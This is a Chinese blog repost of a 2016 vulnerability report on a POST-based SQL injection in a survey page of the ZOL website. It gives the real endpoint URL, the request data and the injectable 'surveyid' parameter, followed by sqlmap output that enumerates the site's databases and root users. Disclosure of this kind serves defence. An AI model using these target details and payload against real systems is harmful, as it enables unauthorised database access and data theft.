中关村在线POST类型SQL注入

作者: kaitoulee | 来源:发表于2016-05-26 19:02 被阅读232次

简要描述:

中关村在线POST类型SQL注入

详细说明:

URL:http://service.zol.com.cn/survey_new/save_new.php

DATA:curtime=1379865600&q1=35&q2=63&q6=23&require_user=0&require_user=0&require_user=0&require_user=0&require_user=0&require_user=0&require_user=0&require_user=0&require_user=0&require_user=0&require_user=0&require_user=0&require_user=0&require_user=0&require_user=0&require_user=0&surveyid=2602&q_num=4&submit=89

注入点 surveyid

漏洞证明:

---

[15:09:46] [INFO] the back-end DBMS is MySQL

web application technology: Apache

back-end DBMS: MySQL 5

[15:09:46] [INFO] fetching database names

[15:09:46] [INFO] fetching number of databases

[15:09:46] [INFO] resumed: 5

[15:09:46] [INFO] resumed: information_schema

[15:09:46] [INFO] resumed: mysql

[15:09:47] [INFO] resumed: pro_vote

[15:09:47] [INFO] resumed: survey

[15:09:47] [INFO] resumed: test

available databases [5]:

[*] information_schema

[*] mysql

[*] pro_vote

[*] survey

[*] test

[15:10:01] [INFO] the back-end DBMS is MySQL

web application technology: Apache

back-end DBMS: MySQL 5

[15:10:01] [INFO] fetching database users

[15:10:01] [INFO] fetching number of database users

[15:10:01] [INFO] resumed: 296

[15:10:01] [INFO] resumed: 'root'@'localhost'

[15:10:01] [INFO] resumed: 'root'@'127.0.0.1'

相关文章

  • 中关村在线POST类型SQL注入

    简要描述: 中关村在线POST类型SQL注入 详细说明: URL:http://service.zol.com.c...

  • SQL注入

    SQL分类: 按照数据类型分类:>整形注入>字符型注入 按照注入语法分类 按照数据提交方式分类> post> ge...

  • sqli-labs(11-20)

    Less-11 手工注入 1.开始为post类型的注入,先加个单引号,报错如下。 构造出SQL语句应该为:sele...

  • sql注入之post注入

    题目信息: 打开题目,有一处搜索框,搜索新闻。考虑SQL注入。 0x01:查找数据库python sqlmap.p...

  • DWVA手把手教程(四)——SQL注入(Post)

    前言 一开始让我写Post方法实现Sql注入我是拒绝的 可是无奈之前已经许诺过了 虽然post方法注入相对简单 但...

  • 谈谈sql注入之注入技术(三)

    谈谈sql注入(二)Sql注入技术: 强制产生错误 对数据库类型、版本等信息进行识别是此类型攻击的动机所在。它的目...

  • 2018-05-08 漏洞1SQL注入

    SQL注入的三种类型:数字型分析注入产生的原因: 访问测试地址: http://192.168.3.35/sql/...

  • DVWA之“SQL注入”

    漏洞类型:SQL注入/Get 字符型 安全级别:Low 目标:通过注入SQL语句,获取 MySql 数据库存放的用...

  • SQL注入 POST注入(less-11)

    万能密码 1.xxx’ or 1 = 1#(最后的#可以换成-- (记住如果是-- 的最后有个空格))【这种是比较...

  • 初识SQL注入

    sql注入 SQL注入的产生过程 转义字符处理不当 类型处理不当 查询集处理不当 错误处理不当 多个提交处理不当(...

网友评论

  • 2c2a96c3514b:看不懂,你写的只有你自己能看懂把!

本文标题:中关村在线POST类型SQL注入

本文链接:https://www.haomeiwen.com/subject/melxdttx.html